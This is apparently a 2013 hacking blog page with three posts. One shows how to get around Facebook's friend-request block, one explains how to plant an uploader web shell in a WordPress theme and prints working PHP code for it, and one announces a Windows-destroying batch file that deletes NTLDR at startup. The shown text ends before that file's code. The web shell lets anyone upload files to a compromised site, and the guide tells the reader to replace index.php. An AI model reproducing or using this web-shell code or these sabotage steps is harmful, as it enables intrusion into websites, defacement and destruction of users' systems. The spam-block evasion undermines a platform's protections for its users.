Wednesday, August 28, 2013

Send Facebook Friend Requests even when you got blocked..!!!! :D


Facebook is a great social networking website through which we can stay connected with friends, relatives and other people. But Facebook does not allow to add strangers as your friends. You might have gone through a stage at least once in your Facebook account when a message appears i.e. your friend request is blocked for 1 day, 3 days, or even 30 days. You can not send friend request on Facebook to anyone whether you know him or not when you are blocked. This is because Facebook doesn’t let to send friend request to unknown people and considers it as spam and therefore temporarily disable sending friend requests when you violate its rules. This is generally done to secure privacy of people and some people by adding strangers as their friend make misuse of that thing.
However, sometimes you may even get blocked when you send friend request to known people but there are a lot of friend requesting awaiting approval pending already. I have also gone from this same stage, and feel helpless that we can’t send friend request to dear friends. So today i will tell you an easy trick with which you can send friend request even if you are blocked.

Ok lets start 

1. open this link - https://www.facebook.com/?sk=ff
2. then click on other tools
If you don’t know the easiest way to make contact file then follow these steps.
  • Open new text document (.txt) in notepad.
  • Add all the email addresses separated by a comma ( , ).
  • Now save that file with the extension .vcf
  • Now this is your contact file.
  • Now Upload this file to Facebook. and you will be prompted to send friend request.
 Click “OK”and You’re done
 Simple yet effective! Your friend request would be sent to desired people.
If you are not blocked from sending Friend Requests but still you get warnings like ‘This Friend Request Can’t Be Sent.. :D ;) 

>>$)R!113x<<

Thursday, August 15, 2013

How to Upload your shell on wordpress websites!!

How to Upload your shell on wordpress websites
 
Just follow the Steps given below:
 
 

1- Login to wordpress. 
Goto site.com http://www.site.com/wp-admin/




2- see "editor" option in "apprearance" and click on editor

3-Now see Right slider bar and click on any option like 404.php or comments.php

4- Edit that code and paste this code there

<?php echo '<b><br><br>'.php_uname().'<br></b>'; echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">'; echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>'; if( $_POST['_upl'] == "Upload" ) {  if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>credits : www.devilscafe.in</b><br><br>'; }  else { echo '<b>Upload Sucess !!!</b><br><br>'; } } ?>

You can paste your shell code too..

5-Now click on update file, and see theme name.
Now Goto http://www.site.com/wp-content/themes/themename/yourshellfile.php 

You will get nw a upload option there, select your shell and upload it and
to vew it goto same directory ..

example: http://www.site.com/wp-content/themes/themename/yourshell.php

Now change index.php in public_html for using shell :D
:D



HACKEDOFF!!!

Sunday, August 11, 2013

Destroying Windows



 WINDESTROYY..
 

Here, its a simple code for destroying any WINDOWS.. 

You can simply do it by deleting the NTLDR file from your system.. Bt its nt so easy to do so.. 

Herez the code to be written in batch file.. and put it in the startup folder. 
So the next you'll switch the windows, it'll be destroyed..